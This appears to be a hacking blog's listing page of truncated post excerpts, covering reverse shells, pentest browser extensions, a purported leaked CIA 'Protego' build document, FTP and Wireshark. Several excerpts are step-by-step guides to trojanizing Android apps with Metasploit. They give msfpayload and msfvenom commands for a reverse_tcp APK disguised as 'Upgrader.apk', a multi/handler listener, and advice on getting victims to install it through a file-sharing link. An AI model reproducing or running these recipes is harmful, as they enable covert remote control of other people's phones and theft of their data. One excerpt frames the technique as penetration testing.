Posts

Extending the Language with a Malware API

Creating a Remote Reverse Shell Tunnel

Attackers use remote shells to connect to their victim's remote machine using an interactive shell. Remote shells enable an attacker to execute OS commands as though he were sitting in front of the victim's machine, and execute commands on behalf of the victim's identity on which the shell's process is running. Telnet and RSH are two examples of “legitimate” services that enable remote clients to connect to another machine and execute commands via the shell's console. Those “direct” or “forward” remote shells are established by the client to the server (the server must, of course, listen to those requests and decide whether to accept them). From an attacker's point of view, it is beneficial to be able to connect to a remote machine and execute OS-level commands. After breaking into a machine, the attacker can set a remote shell server on the machine so that he can establish connections to the machine at a late

Useful Google Chrome Extensions For Penetration Testers & Security Researcher 2022

1. Web Developer is a Google Chrome extension that adds a toolbar with various web development tools in Chrome. With these tools, users can perform various web development tasks. This extension helps in analyzing web application elements like HTML and JS.
2. Firebug Lite for Google Chrome provides a rich visual environment to analyze HTML elements, DOM elements and other Box Model Shading. It also provides live CSS editing. It helps in analyzing how an application is working on the client’s side.
3. d3coder is another nice Google Chrome extension that helps penetration testers. It enables us to encode and decode selected text via context menu. Thus it reduces the time otherwise spent encoding and decoding strings with separate tools. This extension can perform a wide range of functions. See the list below: Timestamp decoding rot13 en-/decodi

How To Remotely Hack Android Device Using Kali Linux

Step 1 Fire-Up Kali: Open a terminal, and make a Trojan .apk. You can do this by typing: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
Step 2 Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing: msfconsole
Step 3 Set-Up a Listener: After it loads (it will take time), load the multi-handler exploit by typing: use exploit/multi/handler Set up a (reverse) payload by typing: set payload android/meterpreter/reverse_tcp To set L host type: set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)
Step 4 Exploit! At last type: exploit to start the listener. Copy the application that you made (Upgrader.apk) from the root folder, to your android phone. Then send it by uploading it to Dropbox or any sharing website (like: www.speedyshare.com ). Then send the link that

CIA LEAKED HACKING TOOL - PROTEGO

SECRET//NOFORN

Building the Protego Images

Introduction

This document describes the builds required for a complete Protego system.

Processor images built for the Protego system:

There are seven build images created for a complete Protego system. The following build images are unique for each Collar, Tube, and Missile set and the keys must match:
1) P1.X.production.hex
2) P2.X.production.hex
3) P3.X.production.hex

The following are used on the Deployment Box for configuration control of any Protego system:
4) P4.X.production.hex
5) P5.X.production.hex

The following build images are used when reprogramming the MP processor:
6) P1_S.X.production.hex
7) P2_ Maintenance.production.hex

Locations of images:
1) P1 - Master Processor (MP), Master Processor on PWA
2) P1_S - Master Processor (MP), Slave Processor on PWA
3) P2 - Tube Smart Switch (TSS) Processor
4) P3 - Missile Smart Switch (MSS) Processor
5) P4 - Deployment Box Slave Processor on PWA
6) P5 - Deploymen

Nasha Exploit Injecting As A Metasploit Payloads Apk Into Android Applications To Remote Control Any Android Device

On the kali linux terminal type - (root💀diago)-[~]# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.*.* LPORT=4444 R > Nasha.apk [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload No encoder specified, outputting raw payload Payload size: 10184 bytes

Embed a Metasploit Payload in an Original .Apk File 2

Embed a Metasploit Payload in an Original .Apk File | Part 2 – Do It Manually Hi guys, I'm here again with my second tutorial, as I promised. Metasploit's flagship product, the Meterpreter, is very powerful and an all-purpose payload. Once installed on the victim machine, we can do whatever we want to their system by sending out commands to it. For example, we could grab sensitive data out of the compromised system. The Meterpreter payload also comes as an installable .apk file for Android systems. Great! Now we can use Metasploit to compromise Android phones also. But if you have tried out these payloads you would know that they do not look convincing. No one in their right mind is going to install and run such an app, which apparently does nothing when it is opened. So how are we going to make the victim run the payload app in their phone? One of the solutions is that you can embed the payload inside another legitimate app. The app will look and behave exactly as the original

Injecting Metasploit Payloads into Android Applications

It is possible to use a legitimate Android application as a Trojan in order to exploit the actual device of the user. This test is important in every Android security assessment because it allows the penetration tester to discover whether there are certain protections around the binary in place. If there are not, and the application could be trojanized by a malicious attacker, then the client should be aware. The process of injecting Metasploit payloads into Android applications can be done both manually and automatically. This post will examine the automated process. However, if time is not a factor in an engagement, then the manual method should be considered.

Payload Generation

Before anything else, the payload that will be used to compromise the mobile device needs to be generated. Metasploit Framework could be used for this activity since it can produce a payload and then extract it as APK file.

FTP Commands for Linux and UNIX

FTP, by itself, is not a reliable way to exchange sensitive business information because it is prone to security attacks. Serv-U MFT Server supports FTP, FTPS, SFTP and HTTP/S protocols for file transfer over IPv4 and IPv6 networks.

FTP (File Transfer Protocol) is a standard network protocol used to exchange files between computers on a private network or through the Internet. There are three ways in which FTP is commonly accessed:
* Command-line FTP client.
* Web browser.
* Graphical FTP clients.

The first two are straightforward methods that allow you to directly use a Web browser (such as Google Chrome, Firefox, Internet Explorer) or an FTP client application (such as FTP Voyager®) to connect to the FTP server to exchange files. Using the command-line interface, you need to enter a set of commands to send or receive files from other computers. Windows, Mac OS X, and Linux operating systems have built-in command-line clients that can be used for establishing an FTP conn

Dark Academy - Kali Linux Information Gathering Tools WIRESHARK

Wireshark Package Description

Wireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions. Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998. Wireshark has a rich feature set which includes the following:
* Deep inspection of hundreds of protocols, with more being added all the time
* Live capture and offline analysis
* Standard three-pane packet browser
* Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
* Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
* The most powerful display filters in the industry
* Rich VoIP analysis
* Capture files compressed with gzip can be decompressed on the fly
* Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM,